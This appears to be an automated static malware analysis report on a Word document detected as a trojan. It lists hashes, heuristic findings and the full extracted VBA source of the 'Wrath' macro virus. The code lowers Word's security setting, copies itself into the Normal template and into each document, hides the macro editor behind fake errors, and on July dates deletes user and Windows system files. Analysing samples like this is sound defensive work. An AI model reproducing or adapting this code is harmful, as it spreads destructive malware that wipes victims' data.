Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3d3545f40afa6cf1…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 2001-07-05 15:38:00
Authoring application: Microsoft Word 8.0
First seen: 2015-10-06
MD5: 75e94b9e54d06546b3392711c52f1c50
SHA-1: 69155481bf69b0cdf85450c5d731b69b88fa6660
SHA-256: 3d3545f40afa6cf17be7837e65658d83d4a2cf345fd69ac4e17330b5c4ee3631
Risk Score: 256

Heuristics (6)

  • ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
    MyApp = Shell("notepad.exe", 1)
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Auto_Close macro (low, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2494 bytes
SHA-256: e5dad4a69a9bcb1f8b0a88e1391a2922683aa61f07d66ae7b6b7281e9351142e
Detection: ClamAV: Doc.Trojan.Wrath-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Wrath"
' Wrath.a
' Coded by tROx and LoX
Sub AutoOpen()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set a = ActiveDocument
Set b = a.VBProject
Set C = b.VBComponents("Wrath")
Set d = NormalTemplate
Set e = d.VBProject
Set f = e.VBComponents
C.Export "C:\MSWIN.DLL"
f.Import ("C:\MSWIN.DLL")
d.Save
Kill "C:\MSWIN.DLL"
Call IfDate
End Sub
Sub Copy()
On Error Resume Next
Set z = NormalTemplate
Set y = z.VBProject
Set x = y.VBComponents("Wrath")
Set w = ActiveDocument
Set v = w.VBProject
Set u = v.VBComponents
x.Export "C:\MSWIN2.DLL"
u.Import ("C:\MSWIN2.DLL")
w.Save
Kill "C:\MSWIN2.DLL"
Call IfDate
End Sub
Sub AutoNew()
On Error Resume Next
Call Copy
End Sub
Sub FileSave()
On Error Resume Next
Call Copy
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call Copy
End Sub
Sub AutoClose()
On Error Resume Next
Call Copy
End Sub
Sub ToolsMacro()
On Error Resume Next
MsgBox "Internal Error.  Word is unable to activate this command.", vbCritical, "Microsoft Word"
Call IfDate
End Sub
Sub ViewVBCode()
On Error Resume Next
MsgBox "Internal Error.  Word is unable to activate this command.", vbCritical, "Microsoft Word"
Call IfDate
End Sub
Sub July3()
On Error Resume Next
Options.BlueScreen = True
MyApp = Shell("notepad.exe", 1)
    SendKeys "                                                                                                                                                                                                                            'FEEL MY WRATH.......'", True
    AppActivate (MyApp)
End Sub
Sub July4()
On Error Resume Next
Options.BlueScreen = True
Kill "C:/My Documents/*.*"
RmDir "C:/My Documents"
Kill "C:/Program Files/Internet Explorer"
Kill "C:/Windows/*.*"
Kill "C:/Windows/System"
Kill "C:/Windows/System32/Drivers"
MsgBox "Happy July 4th!!", vbInformation, "Microsoft Word"
End Sub
Sub IfDate()
On Error Resume Next
If Month(Now) = 7 And Day(Now) = 3 Then
Call July3
End If
If Month(Now) = 7 Then
If Day(Now) > 3 And Day(Now) < 9 Then
Call July4
End If
End If
End Sub